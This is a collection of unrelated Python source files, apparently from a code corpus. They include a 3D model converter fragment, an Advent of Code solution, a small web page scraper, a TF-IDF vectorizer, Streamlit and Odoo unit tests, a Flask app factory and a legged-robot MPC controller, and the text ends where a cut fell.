data = struct.pack('<IIIIHIIII',
vi[0]-1, vi[1]-1, vi[2]-1, vi[3]-1,
f['material'],
ni[0]-1, ni[1]-1, ni[2]-1, ni[3]-1)
buffer.append(data)
# 10. flat quads uv
# ------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# m unsigned short 2
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
# ud unsigned int 4
for f in sfaces['quads_flat_uv']:
vi = f['vertex']
ui = f['uv']
data = struct.pack('<IIIIHIIII',
vi[0]-1, vi[1]-1, vi[2]-1, vi[3]-1,
f['material'],
ui[0]-1, ui[1]-1, ui[2]-1, ui[3]-1)
buffer.append(data)
# 11. smooth quads uv
# -------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# d unsigned int 4
# m unsigned short 2
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
# nd unsigned int 4
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
# ud unsigned int 4
for f in sfaces['quads_smooth_uv']:
vi = f['vertex']
ni = f['normal']
ui = f['uv']
data = struct.pack('<IIIIHIIIIIIII',
vi[0]-1, vi[1]-1, vi[2]-1, vi[3]-1,
f['material'],
ni[0]-1, ni[1]-1, ni[2]-1, ni[3]-1,
ui[0]-1, ui[1]-1, ui[2]-1, ui[3]-1)
buffer.append(data)
path = os.path.dirname(outfile)
fname = os.path.join(path, binfile)
out = open(fname, "wb")
out.write("".join(buffer))
out.close()
# #############################################################################
# Helpers
# #############################################################################
def usage():
print "Usage: %s -i filename.obj -o filename.js [-m morphfiles*.obj] [-c morphcolors*.obj] [-a center|top|bottom] [-s flat|smooth] [-t binary|ascii] [-d invert|normal]" % os.path.basename(sys.argv[0])
# #####################################################
# Main
# #####################################################
if __name__ == "__main__":
# get parameters from the command line
try:
opts, args = getopt.getopt(sys.argv[1:], "hbei:m:c:b:o:a:s:t:d:x:f:", ["help", "bakecolors", "edges", "input=", "morphs=", "colors=", "output=", "align=", "shading=", "type=", "dissolve=", "truncatescale=", "framestep="])
except getopt.GetoptError:
usage()
sys.exit(2)
infile = outfile = ""
morphfiles = ""
colorfiles = ""
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-i", "--input"):
infile = a
elif o in ("-m", "--morphs"):
morphfiles = a
elif o in ("-c", "--colors"):
colorfiles = a
elif o in ("-o", "--output"):
outfile = a
elif o in ("-a", "--align"):
if a in ("top", "bottom", "center", "centerxz", "none"):
ALIGN = a
elif o in ("-s", "--shading"):
if a in ("flat", "smooth"):
SHADING = a
elif o in ("-t", "--type"):
if a in ("binary", "ascii"):
TYPE = a
elif o in ("-d", "--dissolve"):
if a in ("normal", "invert"):
TRANSPARENCY = a
elif o in ("-b", "--bakecolors"):
BAKE_COLORS = True
elif o in ("-e", "--edges"):
EXPORT_EDGES = True
elif o in ("-x", "--truncatescale"):
TRUNCATE = True
SCALE = float(a)
elif o in ("-f", "--framestep"):
FRAMESTEP = int(a)
if infile == "" or outfile == "":
usage()
sys.exit(2)
print "Converting [%s] into [%s] ..." % (infile, outfile)
if morphfiles:
print "Morphs [%s]" % morphfiles
if colorfiles:
print "Colors [%s]" % colorfiles
if TYPE == "ascii":
convert_ascii(infile, morphfiles, colorfiles, outfile)
elif TYPE == "binary":
convert_binary(infile, outfile)
|
py | b4003334ec7796889b359c670631429cd7efe44b | import re
from collections import Counter
with open("puzzles/day2/puzzle_input.txt") as f:
text = f.read()
data = [row.split(":") for row in text.split("\n")]
def checksum(check: str, password: str) -> bool:
m = re.search("(\d+)-(\d+) ([a-z])", check)
id1, id2, char = m.groups()
# because of the space character before password, we can use "index zero"
return (password[int(id1)] == char) ^ (password[int(id2)] == char)
solution = [checksum(check, password) for check, password in data]
print(f"answer of puzzle 2 is:", Counter(solution).get(True))
|
py | b40034640d917a0e93d55e250531c555596077da | import requests
from lxml import etree
def get_one_page(url):
headers = {'User_Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'}
request = requests.get(url=url,headers=headers)
if request.status_code == 200:
return request.text
return none
def main():
url = 'https://maoyan.com/board/4'
content=get_one_page(url)
write_to_file(content)
html=etree.parse('./test.html',etree.HTMLParser())
result=html.xpath('//a[@href="/films/1203"]/@title/text()')
print(result)
def write_to_file(content):
with open ('./test.html','w',encoding='utf-8') as f:
f.write(content)
if __name__=='__main__':
main()
|
py | b400347a22c41756d3b10d851c9fde4b222593b1 | """Self-defined vectorizer"""
import numpy as np
from typing import List
from sklearn.feature_extraction.text import TfidfVectorizer
class TfidfVectorizerWithEntity(TfidfVectorizer):
"""Subclass of TfidfVectorizer to support entity types"""
def __init__(self, input='content', encoding='utf-8',
decode_error='strict', strip_accents=None, lowercase=True,
preprocessor=None, tokenizer=None, analyzer='word',
stop_words=None, token_pattern=r"(?u)\b\w\w+\b",
ngram_range=(1, 1), max_df=1.0, min_df=1,
max_features=None, vocabulary=None, binary=False,
dtype=np.float64, norm='l2', use_idf=True, smooth_idf=True,
sublinear_tf=False, ner=None):
"""
Parameters
----------
ner: instance of named entity recognition.
Its output, taking "Allen like cake." for example,
should be a list in form:
[
{'value': 'Allen', 'type': 'person', 'start': 0, 'end': 5},
{'value': 'cake', 'type': 'food', 'start': 11, 'end': 15}
]
Other Parameters: see comments of TfidfVectorizer
"""
super().__init__(
input=input, encoding=encoding, decode_error=decode_error,
strip_accents=strip_accents, lowercase=lowercase,
preprocessor=preprocessor, tokenizer=tokenizer, analyzer=analyzer,
stop_words=stop_words, token_pattern=token_pattern,
ngram_range=ngram_range, max_df=max_df, min_df=min_df,
max_features=max_features, vocabulary=vocabulary, binary=binary,
dtype=dtype, norm=norm, use_idf=use_idf, smooth_idf=smooth_idf,
sublinear_tf=sublinear_tf)
self._ner = ner
def _mixed_documents(self, raw_documents) -> List[str]:
"""
Mix documents with ner types - simply insert the ner types
before raw documents. Example:
raw docuemnt: "Allen like cake."
ner results: [
{'value': 'Allen', 'type': 'person', 'start': 0, 'end': 5},
{'value': 'cake', 'type': 'food', 'start': 11, 'end': 15}
]
mixed docment: "{person} {food} Allen like cake."
Parameters
----------
raw_documents: an iterable which yields str
Returns
-------
mixed documents, a list of str
"""
if not self._ner:
return raw_documents
mixed_documents = []
for doc in raw_documents:
entities = [
"{" + entity["type"] + "}" for entity in self._ner.process(doc)]
if entities:
mixed_documents.append(" ".join(entities) + " " + doc)
else:
mixed_documents.append(doc)
return mixed_documents
def fit(self, raw_documents, y=None):
return super().fit(self._mixed_documents(raw_documents), y)
def fit_transform(self, raw_documents, y=None):
return super().fit_transform(self._mixed_documents(raw_documents), y)
def transform(self, raw_documents, copy=True):
return super().transform(self._mixed_documents(raw_documents), copy)
|
py | b40034da55bd0ae5a7478749bf0d56c1b72a1248 | # -*- coding: utf-8 -*-
# Copyright 2018-2019 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Magic unit test."""
import unittest
import ast
import sys
import streamlit.magic as magic
is_python_2 = sys.version_info[0] == 2
class MagicTest(unittest.TestCase):
"""Test for Magic
The test counts the number of substitutions that magic.add_code do for
a few code snippets. The test passes if the expected number of
substitutions have been made.
"""
def _testCode(self, code, expected_count):
# Magic is not supported for python2.
if is_python_2:
return
tree = magic.add_magic(code, "./")
count = 0
for node in ast.walk(tree):
# count the nodes where a substitution has been made, i.e.
# look for 'calls' to a 'streamlit' function
if type(node) is ast.Call and "streamlit" in ast.dump(node.func):
count += 1
self.assertEqual(
expected_count,
count,
("There must be exactly {} streamlit nodes, but found {}").format(
expected_count, count
),
)
def test_simple_statement(self):
"""Test simple statements"""
CODE_SIMPLE_STATEMENTS = """
a = 1
b = 10
a
b
"""
self._testCode(CODE_SIMPLE_STATEMENTS, 2)
def test_if_statement(self):
"""Test if statements"""
CODE_IF_STATEMENT = """
a = 1
if True:
a
if False:
a
elif False:
a
else:
a
else:
a
"""
self._testCode(CODE_IF_STATEMENT, 5)
def test_for_statement(self):
"""Test for statements"""
CODE_FOR_STATEMENT = """
a = 1
for i in range(10):
for j in range(2):
a
"""
self._testCode(CODE_FOR_STATEMENT, 1)
def test_try_statement(self):
"""Test try statements"""
CODE_TRY_STATEMENT = """
try:
a = 10
a
except Exception:
try:
a
finally:
a
finally:
a
"""
self._testCode(CODE_TRY_STATEMENT, 4)
def test_function_call_statement(self):
"""Test with function calls"""
CODE_FUNCTION_CALL = """
def myfunc(a):
a
a =10
myfunc(a)
"""
self._testCode(CODE_FUNCTION_CALL, 1)
def test_with_statement(self):
"""Test 'with' statements"""
CODE_WITH_STATEMENT = """
a = 10
with None:
a
"""
self._testCode(CODE_WITH_STATEMENT, 1)
def test_while_statement(self):
"""Test 'while' statements"""
CODE_WHILE_STATEMENT = """
a = 10
while True:
a
"""
self._testCode(CODE_WHILE_STATEMENT, 1)
def test_yield_statement(self):
"""Test that 'yield' expressions do not get magicked"""
CODE_YIELD_STATEMENT = """
def yield_func():
yield
"""
self._testCode(CODE_YIELD_STATEMENT, 0)
def test_yield_from_statement(self):
"""Test that 'yield from' expressions do not get magicked"""
CODE_YIELD_FROM_STATEMENT = """
def yield_func():
yield from None
"""
self._testCode(CODE_YIELD_FROM_STATEMENT, 0)
def test_async_function_statement(self):
"""Test async function definitions"""
CODE_ASYNC_FUNCTION = """
async def myfunc(a):
a
"""
self._testCode(CODE_ASYNC_FUNCTION, 1)
def test_async_with_statement(self):
"""Test 'async with' statements"""
CODE_ASYNC_WITH = """
async def myfunc(a):
async with None:
a
"""
self._testCode(CODE_ASYNC_WITH, 1)
def test_async_for_statement(self):
"""Test 'async for' statements"""
CODE_ASYNC_FOR = """
async def myfunc(a):
async for _ in None:
a
"""
self._testCode(CODE_ASYNC_FOR, 1)
|
py | b40034eb71dc9ebfedb4393431c9c04b8498252f | """main module including create_app()"""
#!/usr/env/python3
# -*- coding: UTF-8 -*-
import logging
import os
from flask import Flask
from .api_handle import create_api
from .mess import get_current_time, set_logger
try:
from .config import IS_DEBUG
except ImportError as config_import_error:
print(config_import_error.args)
raise ImportError(
"Failed to import configs. Please make sure `config.py` exists.")
def create_app(log_path='log'):
"""create initialized flask app, compatible with uwsgi"""
if not os.path.exists(log_path):
raise FileNotFoundError(f'Log path does not exist: `{log_path}`.')
set_logger(
f'{log_path}/telegram_relay_{get_current_time()}_{os.getpid()}.log')
app = Flask(__name__)
api = create_api()
api.init_app(app)
logging.info('%r', app.view_functions)
logging.info('%r', app.url_map)
return app
|
py | b40035a86717ca95ca8f29d84900778b08922810 | # Lint as: python3
"""A torque based stance controller framework."""
from __future__ import absolute_import
from __future__ import division
#from __future__ import google_type_annotations
from __future__ import print_function
import os
import inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
os.sys.path.insert(0, parentdir)
from typing import Any, Sequence, Tuple
import numpy as np
import pybullet as p # pytype: disable=import-error
try:
from mpc_controller import gait_generator as gait_generator_lib
from mpc_controller import leg_controller
except: #pylint: disable=W0702
print("You need to install motion_imitation")
print("Either run python3 setup.py install --user in this repo")
print("or use pip3 install motion_imitation --user")
sys.exit()
try:
import mpc_osqp as convex_mpc # pytype: disable=import-error
except: #pylint: disable=W0702
print("You need to install motion_imitation")
print("Either run python3 setup.py install --user in this repo")
print("or use pip3 install motion_imitation --user")
sys.exit()
_FORCE_DIMENSION = 3
# The QP weights in the convex MPC formulation. See the MIT paper for details:
# https://ieeexplore.ieee.org/document/8594448/
# Intuitively, this is the weights of each state dimension when tracking a
# desired CoM trajectory. The full CoM state is represented by
# (roll_pitch_yaw, position, angular_velocity, velocity, gravity_place_holder).
# _MPC_WEIGHTS = (5, 5, 0.2, 0, 0, 10, 0.5, 0.5, 0.2, 0.2, 0.2, 0.1, 0)
# This worked well for in-place stepping in the real robot.
# _MPC_WEIGHTS = (5, 5, 0.2, 0, 0, 10, 0., 0., 0.2, 1., 1., 0., 0)
_MPC_WEIGHTS = (5, 5, 0.2, 0, 0, 10, 0., 0., 1., 1., 1., 0., 0)
_PLANNING_HORIZON_STEPS = 10
_PLANNING_TIMESTEP = 0.025
class TorqueStanceLegController(leg_controller.LegController):
"""A torque based stance leg controller framework.
Takes in high level parameters like walking speed and turning speed, and
generates necessary the torques for stance legs.
"""
def __init__(
self,
robot: Any,
gait_generator: Any,
state_estimator: Any,
desired_speed: Tuple[float, float] = (0, 0),
desired_twisting_speed: float = 0,
desired_body_height: float = 0.42,
body_mass: float = 50 / 9.8,
body_inertia: Tuple[float, float, float, float, float, float, float,
float, float] = (0.07335, 0, 0, 0, 0.25068, 0, 0, 0,
0.25447),
num_legs: int = 2,
friction_coeffs: Sequence[float] = (0.45, 0.45),
qp_solver = convex_mpc.QPOASES
):
"""Initializes the class.
Tracks the desired position/velocity of the robot by computing proper joint
torques using MPC module.
Args:
robot: A robot instance.
gait_generator: Used to query the locomotion phase and leg states.
state_estimator: Estimate the robot states (e.g. CoM velocity).
desired_speed: desired CoM speed in x-y plane.
desired_twisting_speed: desired CoM rotating speed in z direction.
desired_body_height: The standing height of the robot.
body_mass: The total mass of the robot.
body_inertia: The inertia matrix in the body principle frame. We assume
the body principle coordinate frame has x-forward and z-up.
num_legs: The number of legs used for force planning.
friction_coeffs: The friction coeffs on the contact surfaces.
"""
self._robot = robot
self._gait_generator = gait_generator
self._state_estimator = state_estimator
self.desired_speed = desired_speed
self.desired_twisting_speed = desired_twisting_speed
self._desired_body_height = desired_body_height
self._body_mass = body_mass
self._num_legs = num_legs
self._friction_coeffs = np.array(friction_coeffs)
body_inertia_list = list(body_inertia)
weights_list = list(_MPC_WEIGHTS)
self._cpp_mpc = convex_mpc.ConvexMpc(
body_mass,
body_inertia_list,
self._num_legs,
_PLANNING_HORIZON_STEPS,
_PLANNING_TIMESTEP,
weights_list,
1e-5,
qp_solver
)
def reset(self, current_time):
del current_time
def update(self, current_time):
del current_time
def get_action(self):
"""Computes the torque for stance legs."""
desired_com_position = np.array((0., 0., self._desired_body_height),
dtype=np.float64)
desired_com_velocity = np.array(
(self.desired_speed[0], self.desired_speed[1], 0.), dtype=np.float64)
desired_com_roll_pitch_yaw = np.array((0., 0., 0.), dtype=np.float64)
desired_com_angular_velocity = np.array(
(0., 0., self.desired_twisting_speed), dtype=np.float64)
foot_contact_state = np.array(
[(leg_state in (gait_generator_lib.LegState.STANCE,
gait_generator_lib.LegState.EARLY_CONTACT))
for leg_state in self._gait_generator.desired_leg_state],
dtype=np.int32)
# We use the body yaw aligned world frame for MPC computation.
com_roll_pitch_yaw = np.array(self._robot.GetBaseRollPitchYaw(),
dtype=np.float64)
com_roll_pitch_yaw[2] = 0
#predicted_contact_forces=[0]*self._num_legs*_FORCE_DIMENSION
# print("Com Vel: {}".format(self._state_estimator.com_velocity_body_frame))
# print("Com RPY: {}".format(self._robot.GetBaseRollPitchYawRate()))
# print("Com RPY Rate: {}".format(self._robot.GetBaseRollPitchYawRate()))
p.submitProfileTiming("predicted_contact_forces")
predicted_contact_forces = self._cpp_mpc.compute_contact_forces(
[0], #com_position
np.asarray(self._state_estimator.com_velocity_body_frame,
dtype=np.float64), #com_velocity
np.array(com_roll_pitch_yaw, dtype=np.float64), #com_roll_pitch_yaw
# Angular velocity in the yaw aligned world frame is actually different
# from rpy rate. We use it here as a simple approximation.
np.asarray(self._robot.GetBaseRollPitchYawRate(),
dtype=np.float64), #com_angular_velocity
foot_contact_state, #foot_contact_states
np.array(self._robot.GetFootPositionsInBaseFrame().flatten(),
dtype=np.float64), #foot_positions_base_frame
self._friction_coeffs, #foot_friction_coeffs
desired_com_position, #desired_com_position
desired_com_velocity, #desired_com_velocity
desired_com_roll_pitch_yaw, #desired_com_roll_pitch_yaw
desired_com_angular_velocity #desired_com_angular_velocity
)
p.submitProfileTiming()
# sol = np.array(predicted_contact_forces).reshape((-1, 12))
# x_dim = np.array([0, 3, 6, 9])
# y_dim = x_dim + 1
# z_dim = y_dim + 1
# print("Y_forces: {}".format(sol[:, y_dim]))
contact_forces = {}
for i in range(self._num_legs):
contact_forces[i] = np.array(
predicted_contact_forces[i * _FORCE_DIMENSION:(i + 1) *
_FORCE_DIMENSION])
action = {}
for leg_id, force in contact_forces.items():
# While "Lose Contact" is useful in simulation, in real environment it's
# susceptible to sensor noise. Disabling for now.
# if self._gait_generator.leg_state[
# leg_id] == gait_generator_lib.LegState.LOSE_CONTACT:
# force = (0, 0, 0)
motor_torques = self._robot.MapContactForceToJointTorques(leg_id, force)
for joint_id, torque in motor_torques.items():
action[joint_id] = (0, 0, 0, 0, torque)
return action, contact_forces
|
py | b40035dadd69da8fc22ff7d24fd7439198021510 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import psycopg2
from odoo.models import BaseModel
from odoo.tests.common import TransactionCase
from odoo.tools import mute_logger
from odoo.osv import expression
class TestExpression(TransactionCase):
def test_00_in_not_in_m2m(self):
# Create 4 partners with no category, or one or two categories (out of two categories).
categories = self.env['res.partner.category']
cat_a = categories.create({'name': 'test_expression_category_A'})
cat_b = categories.create({'name': 'test_expression_category_B'})
partners = self.env['res.partner']
a = partners.create({'name': 'test_expression_partner_A', 'category_id': [(6, 0, [cat_a.id])]})
b = partners.create({'name': 'test_expression_partner_B', 'category_id': [(6, 0, [cat_b.id])]})
ab = partners.create({'name': 'test_expression_partner_AB', 'category_id': [(6, 0, [cat_a.id, cat_b.id])]})
c = partners.create({'name': 'test_expression_partner_C'})
# The tests.
# On a one2many or many2many field, `in` should be read `contains` (and
# `not in` should be read `doesn't contain`.
with_a = partners.search([('category_id', 'in', [cat_a.id])])
self.assertEqual(a + ab, with_a, "Search for category_id in cat_a failed.")
with_b = partners.search([('category_id', 'in', [cat_b.id])])
self.assertEqual(b + ab, with_b, "Search for category_id in cat_b failed.")
# Partners with the category A or the category B.
with_a_or_b = partners.search([('category_id', 'in', [cat_a.id, cat_b.id])])
self.assertEqual(a + b + ab, with_a_or_b, "Search for category_id contains cat_a or cat_b failed.")
# Show that `contains list` is really `contains element or contains element`.
with_a_or_with_b = partners.search(['|', ('category_id', 'in', [cat_a.id]), ('category_id', 'in', [cat_b.id])])
self.assertEqual(a + b + ab, with_a_or_with_b, "Search for category_id contains cat_a or contains cat_b failed.")
# If we change the OR in AND...
with_a_and_b = partners.search([('category_id', 'in', [cat_a.id]), ('category_id', 'in', [cat_b.id])])
self.assertEqual(ab, with_a_and_b, "Search for category_id contains cat_a and cat_b failed.")
# Partners without category A and without category B.
without_a_or_b = partners.search([('category_id', 'not in', [cat_a.id, cat_b.id])])
self.assertFalse(without_a_or_b & (a + b + ab), "Search for category_id doesn't contain cat_a or cat_b failed (1).")
self.assertTrue(c in without_a_or_b, "Search for category_id doesn't contain cat_a or cat_b failed (2).")
# Show that `doesn't contain list` is really `doesn't contain element and doesn't contain element`.
without_a_and_without_b = partners.search([('category_id', 'not in', [cat_a.id]), ('category_id', 'not in', [cat_b.id])])
self.assertFalse(without_a_and_without_b & (a + b + ab), "Search for category_id doesn't contain cat_a and cat_b failed (1).")
self.assertTrue(c in without_a_and_without_b, "Search for category_id doesn't contain cat_a and cat_b failed (2).")
# We can exclude any partner containing the category A.
without_a = partners.search([('category_id', 'not in', [cat_a.id])])
self.assertTrue(a not in without_a, "Search for category_id doesn't contain cat_a failed (1).")
self.assertTrue(ab not in without_a, "Search for category_id doesn't contain cat_a failed (2).")
self.assertLessEqual(b + c, without_a, "Search for category_id doesn't contain cat_a failed (3).")
# (Obviously we can do the same for cateory B.)
without_b = partners.search([('category_id', 'not in', [cat_b.id])])
self.assertTrue(b not in without_b, "Search for category_id doesn't contain cat_b failed (1).")
self.assertTrue(ab not in without_b, "Search for category_id doesn't contain cat_b failed (2).")
self.assertLessEqual(a + c, without_b, "Search for category_id doesn't contain cat_b failed (3).")
def test_05_not_str_m2m(self):
partners = self.env['res.partner']
categories = self.env['res.partner.category']
cids = {}
for name in 'A B AB'.split():
cids[name] = categories.create({'name': name}).id
partners_config = {
'0': [],
'a': [cids['A']],
'b': [cids['B']],
'ab': [cids['AB']],
'a b': [cids['A'], cids['B']],
'b ab': [cids['B'], cids['AB']],
}
pids = {}
for name, cat_ids in partners_config.items():
pids[name] = partners.create({'name': name, 'category_id': [(6, 0, cat_ids)]}).id
base_domain = [('id', 'in', list(pids.values()))]
def test(op, value, expected):
found_ids = partners.search(base_domain + [('category_id', op, value)]).ids
expected_ids = [pids[name] for name in expected]
self.assertItemsEqual(found_ids, expected_ids, '%s %r should return %r' % (op, value, expected))
test('=', 'A', ['a', 'a b'])
test('!=', 'B', ['0', 'a', 'ab'])
test('like', 'A', ['a', 'ab', 'a b', 'b ab'])
test('not ilike', 'B', ['0', 'a'])
test('not like', 'AB', ['0', 'a', 'b', 'a b'])
def test_10_hierarchy_in_m2m(self):
Partner = self.env['res.partner']
Category = self.env['res.partner.category']
# search through m2m relation
partners = Partner.search([('category_id', 'child_of', self.ref('base.res_partner_category_0'))])
self.assertTrue(partners)
# setup test partner categories
categ_root = Category.create({'name': 'Root category'})
categ_0 = Category.create({'name': 'Parent category', 'parent_id': categ_root.id})
categ_1 = Category.create({'name': 'Child1', 'parent_id': categ_0.id})
# test hierarchical search in m2m with child id (list of ids)
cats = Category.search([('id', 'child_of', categ_root.ids)])
self.assertEqual(len(cats), 3)
# test hierarchical search in m2m with child id (single id)
cats = Category.search([('id', 'child_of', categ_root.id)])
self.assertEqual(len(cats), 3)
# test hierarchical search in m2m with child ids
cats = Category.search([('id', 'child_of', (categ_0 + categ_1).ids)])
self.assertEqual(len(cats), 2)
# test hierarchical search in m2m with child ids
cats = Category.search([('id', 'child_of', categ_0.ids)])
self.assertEqual(len(cats), 2)
# test hierarchical search in m2m with child ids
cats = Category.search([('id', 'child_of', categ_1.ids)])
self.assertEqual(len(cats), 1)
# test hierarchical search in m2m with an empty list
cats = Category.search([('id', 'child_of', [])])
self.assertEqual(len(cats), 0)
# test hierarchical search in m2m with 'False' value
with self.assertLogs('odoo.osv.expression'):
cats = Category.search([('id', 'child_of', False)])
self.assertEqual(len(cats), 0)
# test hierarchical search in m2m with parent id (list of ids)
cats = Category.search([('id', 'parent_of', categ_1.ids)])
self.assertEqual(len(cats), 3)
# test hierarchical search in m2m with parent id (single id)
cats = Category.search([('id', 'parent_of', categ_1.id)])
self.assertEqual(len(cats), 3)
# test hierarchical search in m2m with parent ids
cats = Category.search([('id', 'parent_of', (categ_root + categ_0).ids)])
self.assertEqual(len(cats), 2)
# test hierarchical search in m2m with parent ids
cats = Category.search([('id', 'parent_of', categ_0.ids)])
self.assertEqual(len(cats), 2)
# test hierarchical search in m2m with parent ids
cats = Category.search([('id', 'parent_of', categ_root.ids)])
self.assertEqual(len(cats), 1)
# test hierarchical search in m2m with an empty list
cats = Category.search([('id', 'parent_of', [])])
self.assertEqual(len(cats), 0)
# test hierarchical search in m2m with 'False' value
with self.assertLogs('odoo.osv.expression'):
cats = Category.search([('id', 'parent_of', False)])
self.assertEqual(len(cats), 0)
def test_10_equivalent_id(self):
# equivalent queries
Currency = self.env['res.currency']
non_currency_id = max(Currency.search([]).ids) + 1003
res_0 = Currency.search([])
res_1 = Currency.search([('name', 'not like', 'probably_unexisting_name')])
self.assertEqual(res_0, res_1)
res_2 = Currency.search([('id', 'not in', [non_currency_id])])
self.assertEqual(res_0, res_2)
res_3 = Currency.search([('id', 'not in', [])])
self.assertEqual(res_0, res_3)
res_4 = Currency.search([('id', '!=', False)])
self.assertEqual(res_0, res_4)
# equivalent queries, integer and string
Partner = self.env['res.partner']
all_partners = Partner.search([])
self.assertTrue(len(all_partners) > 1)
one = all_partners[0]
others = all_partners[1:]
res_1 = Partner.search([('id', '=', one.id)])
self.assertEqual(one, res_1)
# Partner.search([('id', '!=', others)]) # not permitted
res_2 = Partner.search([('id', 'not in', others.ids)])
self.assertEqual(one, res_2)
res_3 = Partner.search(['!', ('id', '!=', one.id)])
self.assertEqual(one, res_3)
res_4 = Partner.search(['!', ('id', 'in', others.ids)])
self.assertEqual(one, res_4)
# res_5 = Partner.search([('id', 'in', one)]) # TODO make it permitted, just like for child_of
# self.assertEqual(one, res_5)
res_6 = Partner.search([('id', 'in', [one.id])])
self.assertEqual(one, res_6)
res_7 = Partner.search([('name', '=', one.name)])
self.assertEqual(one, res_7)
res_8 = Partner.search([('name', 'in', [one.name])])
# res_9 = Partner.search([('name', 'in', one.name)]) # TODO
def test_15_m2o(self):
Partner = self.env['res.partner']
# testing equality with name
partners = Partner.search([('parent_id', '=', 'Deco Addict')])
self.assertTrue(partners)
# testing the in operator with name
partners = Partner.search([('parent_id', 'in', 'Deco Addict')])
self.assertTrue(partners)
# testing the in operator with a list of names
partners = Partner.search([('parent_id', 'in', ['Deco Addict', 'Wood Corner'])])
self.assertTrue(partners)
# check if many2one works with empty search list
partners = Partner.search([('company_id', 'in', [])])
self.assertFalse(partners)
# create new company with partners, and partners with no company
company2 = self.env['res.company'].create({'name': 'Acme 2'})
for i in range(4):
Partner.create({'name': 'P of Acme %s' % i, 'company_id': company2.id})
Partner.create({'name': 'P of All %s' % i, 'company_id': False})
# check if many2one works with negative empty list
all_partners = Partner.search([])
res_partners = Partner.search(['|', ('company_id', 'not in', []), ('company_id', '=', False)])
self.assertEqual(all_partners, res_partners, "not in [] fails")
# check that many2one will pick the correct records with a list
partners = Partner.search([('company_id', 'in', [False])])
self.assertTrue(len(partners) >= 4, "We should have at least 4 partners with no company")
# check that many2one will exclude the correct records with a list
partners = Partner.search([('company_id', 'not in', [1])])
self.assertTrue(len(partners) >= 4, "We should have at least 4 partners not related to company #1")
# check that many2one will exclude the correct records with a list and False
partners = Partner.search(['|', ('company_id', 'not in', [1]),
('company_id', '=', False)])
self.assertTrue(len(partners) >= 8, "We should have at least 8 partners not related to company #1")
# check that multi-level expressions also work
partners = Partner.search([('company_id.partner_id', 'in', [])])
self.assertFalse(partners)
# check multi-level expressions with magic columns
partners = Partner.search([('create_uid.active', '=', True)])
# check that multi-level expressions with negative op work
all_partners = Partner.search([('company_id', '!=', False)])
res_partners = Partner.search([('company_id.partner_id', 'not in', [])])
self.assertEqual(all_partners, res_partners, "not in [] fails")
# Test the '(not) like/in' behavior. res.partner and its parent_id
# column are used because parent_id is a many2one, allowing to test the
# Null value, and there are actually some null and non-null values in
# the demo data.
all_partners = Partner.search([])
non_partner_id = max(all_partners.ids) + 1
with_parent = all_partners.filtered(lambda p: p.parent_id)
without_parent = all_partners.filtered(lambda p: not p.parent_id)
with_website = all_partners.filtered(lambda p: p.website)
# We treat null values differently than in SQL. For instance in SQL:
# SELECT id FROM res_partner WHERE parent_id NOT IN (0)
# will return only the records with non-null parent_id.
# SELECT id FROM res_partner WHERE parent_id IN (0)
# will return expectedly nothing (our ids always begin at 1).
# This means the union of those two results will give only some
# records, but not all present in database.
#
# When using domains and the ORM's search method, we think it is
# more intuitive that the union returns all the records, and that
# a domain like ('parent_id', 'not in', [0]) will return all
# the records. For instance, if you perform a search for the companies
# that don't have OpenERP has a parent company, you expect to find,
# among others, the companies that don't have parent company.
#
# existing values be treated similarly if we simply check that some
# existing value belongs to them.
res_0 = Partner.search([('parent_id', 'not like', 'probably_unexisting_name')]) # get all rows, included null parent_id
self.assertEqual(res_0, all_partners)
res_1 = Partner.search([('parent_id', 'not in', [non_partner_id])]) # get all rows, included null parent_id
self.assertEqual(res_1, all_partners)
res_2 = Partner.search([('parent_id', '!=', False)]) # get rows with not null parent_id, deprecated syntax
self.assertEqual(res_2, with_parent)
res_3 = Partner.search([('parent_id', 'not in', [])]) # get all rows, included null parent_id
self.assertEqual(res_3, all_partners)
res_4 = Partner.search([('parent_id', 'not in', [False])]) # get rows with not null parent_id
self.assertEqual(res_4, with_parent)
res_4b = Partner.search([('parent_id', 'not ilike', '')]) # get only rows without parent
self.assertEqual(res_4b, without_parent)
# The results of these queries, when combined with queries 0..4 must
# give the whole set of ids.
res_5 = Partner.search([('parent_id', 'like', 'probably_unexisting_name')])
self.assertFalse(res_5)
res_6 = Partner.search([('parent_id', 'in', [non_partner_id])])
self.assertFalse(res_6)
res_7 = Partner.search([('parent_id', '=', False)])
self.assertEqual(res_7, without_parent)
res_8 = Partner.search([('parent_id', 'in', [])])
self.assertFalse(res_8)
res_9 = Partner.search([('parent_id', 'in', [False])])
self.assertEqual(res_9, without_parent)
res_9b = Partner.search([('parent_id', 'ilike', '')]) # get those with a parent
self.assertEqual(res_9b, with_parent)
# These queries must return exactly the results than the queries 0..4,
# i.e. not ... in ... must be the same as ... not in ... .
res_10 = Partner.search(['!', ('parent_id', 'like', 'probably_unexisting_name')])
self.assertEqual(res_0, res_10)
res_11 = Partner.search(['!', ('parent_id', 'in', [non_partner_id])])
self.assertEqual(res_1, res_11)
res_12 = Partner.search(['!', ('parent_id', '=', False)])
self.assertEqual(res_2, res_12)
res_13 = Partner.search(['!', ('parent_id', 'in', [])])
self.assertEqual(res_3, res_13)
res_14 = Partner.search(['!', ('parent_id', 'in', [False])])
self.assertEqual(res_4, res_14)
# Testing many2one field is not enough, a regular char field is tested
res_15 = Partner.search([('website', 'in', [])])
self.assertFalse(res_15)
res_16 = Partner.search([('website', 'not in', [])])
self.assertEqual(res_16, all_partners)
res_17 = Partner.search([('website', '!=', False)])
self.assertEqual(res_17, with_website)
